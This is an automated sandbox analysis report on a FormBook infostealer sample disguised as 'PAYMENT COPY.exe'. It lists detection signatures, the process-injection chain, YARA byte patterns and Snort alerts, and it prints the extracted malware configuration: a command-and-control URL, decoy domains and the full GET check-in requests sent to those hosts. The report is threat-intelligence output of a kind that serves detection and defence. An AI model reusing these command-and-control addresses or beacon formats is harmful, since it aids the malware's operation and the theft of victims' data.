Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report PAYMENT COPY.exe

Overview

General Information

Sample Name:PAYMENT COPY.exe
Analysis ID:385291
MD5:0cdbfdf044cfa1d810ed06b745ac9cd9
SHA1:124e5c370a103888227112141ea559b85ae17656
SHA256:8d85a4dbf755253e9f46aafa65f5374431e5843e6d1fa6ab61ef238919d9f6bb
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PAYMENT COPY.exe (PID: 6544 cmdline: 'C:\Users\user\Desktop\PAYMENT COPY.exe' MD5: 0CDBFDF044CFA1D810ED06B745AC9CD9)
    • PAYMENT COPY.exe (PID: 6592 cmdline: 'C:\Users\user\Desktop\PAYMENT COPY.exe' MD5: 0CDBFDF044CFA1D810ED06B745AC9CD9)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 6808 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 6856 cmdline: /c del 'C:\Users\user\Desktop\PAYMENT COPY.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cursosdigitaisbr.com/eqas/"], "decoy": ["elitereliableservices.com", "mmidyat.com", "undergroundtreehouserecords.com", "kakavjesajt.com", "rainbowrichesonlineslots.com", "sportfest40.com", "doubletc.pro", "foothillvbc.com", "bergvarme-installasjon.com", "mural.institute", "thewanderingflamingo.com", "teacherautomation.com", "sunberry.icu", "sebastian249.com", "cjaccessories.net", "cantonpod.com", "successshogi.xyz", "labsaguniminuto.com", "trancetherapysessions.com", "beyoncos.com", "agasete.com", "mg-izkerr8.net", "theonyxaffect.com", "modala.net", "boardgameschronicle.com", "ateliemundodaju.com", "llmav.xyz", "friedlinefamily.com", "whizzx.com", "leadingbusinessstrategies.com", "holidayspreesweepstakes.com", "nescleanups.com", "byyann.com", "cupidwealthmanagement.com", "exactcoach.site", "35efb510815e.com", "cablepd.com", "brokearchives.com", "spazio-living.com", "quantize.fund", "mexicoaprende.online", "mireiaclua.com", "360caiyin.com", "sharprenovationsusa.com", "yomeformo.online", "onebasketball.team", "planchadoraautomatica.com", "huaguoxianflushing.com", "misskarenwnglishteacher.com", "pasta-pop.com", "kuihua0101.com", "gabrielesantoro.com", "healthtransformationnetwork.com", "comicexplosion.com", "ebikestore.online", "luewhhedre.com", "xn--vensmasajsalonu-1vb.com", "cazataxservices.com", "hotelmanagementtech.com", "curiget.xyz", "greenviewholidays.com", "casinobetdeals.com", "stripepayment.online", "shelfcorpsale.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.1.PAYMENT COPY.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.1.PAYMENT COPY.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.1.PAYMENT COPY.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158c9:$sqlite3step: 68 34 1C 7B E1
        • 0x159dc:$sqlite3step: 68 34 1C 7B E1
        • 0x158f8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
        • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
        2.2.PAYMENT COPY.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.PAYMENT COPY.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: www.cursosdigitaisbr.com/eqas/Avira URL Cloud: Label: malware
          Source: http://www.cursosdigitaisbr.com/eqas/?Kzrx=967KBfj8+VhMtFT4MuSkf1Q16ympYDb2+7V4ZV0KQDLb45yTiH1Ahm088ZXNCPpC8jR0PY64Fw==&4h3=vZRDNDdpalAdz8Avira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.cursosdigitaisbr.com/eqas/"], "decoy": ["elitereliableservices.com", "mmidyat.com", "undergroundtreehouserecords.com", "kakavjesajt.com", "rainbowrichesonlineslots.com", "sportfest40.com", "doubletc.pro", "foothillvbc.com", "bergvarme-installasjon.com", "mural.institute", "thewanderingflamingo.com", "teacherautomation.com", "sunberry.icu", "sebastian249.com", "cjaccessories.net", "cantonpod.com", "successshogi.xyz", "labsaguniminuto.com", "trancetherapysessions.com", "beyoncos.com", "agasete.com", "mg-izkerr8.net", "theonyxaffect.com", "modala.net", "boardgameschronicle.com", "ateliemundodaju.com", "llmav.xyz", "friedlinefamily.com", "whizzx.com", "leadingbusinessstrategies.com", "holidayspreesweepstakes.com", "nescleanups.com", "byyann.com", "cupidwealthmanagement.com", "exactcoach.site", "35efb510815e.com", "cablepd.com", "brokearchives.com", "spazio-living.com", "quantize.fund", "mexicoaprende.online", "mireiaclua.com", "360caiyin.com", "sharprenovationsusa.com", "yomeformo.online", "onebasketball.team", "planchadoraautomatica.com", "huaguoxianflushing.com", "misskarenwnglishteacher.com", "pasta-pop.com", "kuihua0101.com", "gabrielesantoro.com", "healthtransformationnetwork.com", "comicexplosion.com", "ebikestore.online", "luewhhedre.com", "xn--vensmasajsalonu-1vb.com", "cazataxservices.com", "hotelmanagementtech.com", "curiget.xyz", "greenviewholidays.com", "casinobetdeals.com", "stripepayment.online", "shelfcorpsale.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: PAYMENT COPY.exeVirustotal: Detection: 32%Perma Link
          Source: PAYMENT COPY.exeReversingLabs: Detection: 27%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.2650000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.2650000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 2.1.PAYMENT COPY.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.msdt.exe.51e7960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.2.PAYMENT COPY.exe.2650000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.msdt.exe.e45378.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.2.PAYMENT COPY.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: PAYMENT COPY.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.360125493.0000000007CA0000.00000002.00000001.sdmp
          Source: Binary string: msdt.pdbGCTL source: PAYMENT COPY.exe, 00000002.00000002.379579567.0000000002750000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PAYMENT COPY.exe, 00000001.00000003.335333892.000000001F140000.00000004.00000001.sdmp, PAYMENT COPY.exe, 00000002.00000002.379228424.0000000000BCF000.00000040.00000001.sdmp, msdt.exe, 00000005.00000002.595219970.0000000004CB0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PAYMENT COPY.exe, msdt.exe
          Source: Binary string: msdt.pdb source: PAYMENT COPY.exe, 00000002.00000002.379579567.0000000002750000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.360125493.0000000007CA0000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004026BC FindFirstFileA,
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49723 -> 104.21.28.135:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49723 -> 104.21.28.135:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49723 -> 104.21.28.135:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 14.129.120.32:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 14.129.120.32:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 14.129.120.32:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.cursosdigitaisbr.com/eqas/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.llmav.xyz
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=zlzoH+ErGdORI3KgnipEDQmAM+5mnlewXlSz4LF6ZDcdx8uItHTjoqljxUMZx7tHvLXvbS3vgg==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.cjaccessories.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=5vTDjg0AbqyZCldj/4uhpy3uniwA6wzjOzlj8Zy6y3xAduLQBKf0xYSENAev/AVhLePpE/aK2w==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.sportfest40.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=2WJx48jh/thZFm4UaW0+TWvb4qp7q1IcEsHJj26+PoNJlpUOGtb5NswHfLJoC/AYmsRkDoJx/Q==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.kakavjesajt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=967KBfj8+VhMtFT4MuSkf1Q16ympYDb2+7V4ZV0KQDLb45yTiH1Ahm088ZXNCPpC8jR0PY64Fw==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.cursosdigitaisbr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=ZOpWeYl13G0nYt67dVF2CnLu74JWwlwH6kqD7vFNiwsDSsXFN4+zplc98svsYfoyCRsuDbeIEw==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.llmav.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=+pdiEsaPT2Qcmu2ts2xxLdHpIsIAjIekwLbYEBSMYRvbotqJwTsf/hFk1ceM/lb+HZzWB3Gpcg==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.35efb510815e.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=vogt4SdM7257j7Tk1uEKvDVNcysLCgoPP/omvU9RbfjhJlgcGqamOKpa157N0oGBpfPcf/L32A==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.beyoncos.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=zlzoH+ErGdORI3KgnipEDQmAM+5mnlewXlSz4LF6ZDcdx8uItHTjoqljxUMZx7tHvLXvbS3vgg==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.cjaccessories.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=5vTDjg0AbqyZCldj/4uhpy3uniwA6wzjOzlj8Zy6y3xAduLQBKf0xYSENAev/AVhLePpE/aK2w==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.sportfest40.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=2WJx48jh/thZFm4UaW0+TWvb4qp7q1IcEsHJj26+PoNJlpUOGtb5NswHfLJoC/AYmsRkDoJx/Q==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.kakavjesajt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=967KBfj8+VhMtFT4MuSkf1Q16ympYDb2+7V4ZV0KQDLb45yTiH1Ahm088ZXNCPpC8jR0PY64Fw==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.cursosdigitaisbr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=ZOpWeYl13G0nYt67dVF2CnLu74JWwlwH6kqD7vFNiwsDSsXFN4+zplc98svsYfoyCRsuDbeIEw==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.llmav.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=+pdiEsaPT2Qcmu2ts2xxLdHpIsIAjIekwLbYEBSMYRvbotqJwTsf/hFk1ceM/lb+HZzWB3Gpcg==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.35efb510815e.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /eqas/?Kzrx=vogt4SdM7257j7Tk1uEKvDVNcysLCgoPP/omvU9RbfjhJlgcGqamOKpa157N0oGBpfPcf/L32A==&4h3=vZRDNDdpalAdz8 HTTP/1.1Host: www.beyoncos.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.cjaccessories.net
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: httpv2(13.12)Date: Mon, 12 Apr 2021 07:46:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 0a 3a 3a 73 65 6c 65 63 74 69 6f 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 31 33 33 30 30 3b 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 20 7d 0a 3a 3a 2d 6d 6f 7a 2d 73 65 6c 65 63 74 69 6f 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 31 33 33 30 30 3b 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 20 7d 0a 0a 62 6f 64 79 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 6d 61 72 67 69 6e 3a 20 34 30 70 78 3b 0a 09 66 6f 6e 74 3a 20 31 33 70 78 2f 32 30 70 78 20 6e 6f 72 6d 61 6c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 63 6f 6c 6f 72 3a 20 23 34 46 35 31 35 35 3b 0a 7d 0a 0a 61 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 33 33 39 39 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 7d 0a 0a 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 39 70 78 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 34 70 78 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 34 70 78 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 0a 7d 0a 0a 63 6f 64 65 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 43 6f 75 72 69 65 72 20 4e 65 77 2c 20 43 6f 75 72 69 65 72 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 39 66 39 66 39 3b 0a 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 32 31 36 36 3b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 6d 61 72 67 69 6e 3a 20 31 34 70 78 20 30 20 31 34 70 78 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 32 70 78 20 31 30 70 78 20 31 32 70 78 20 31 30 70 78 3b 0a 7d 0a 0a 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 31 30 70 78 3b 0a 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 38 70
          Source: msdt.exe, 00000005.00000002.598191683.0000000005362000.00000004.00000001.sdmpString found in binary or memory: http://181ue.com/sq.html?entry=
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000002.594277957.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.365874428.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
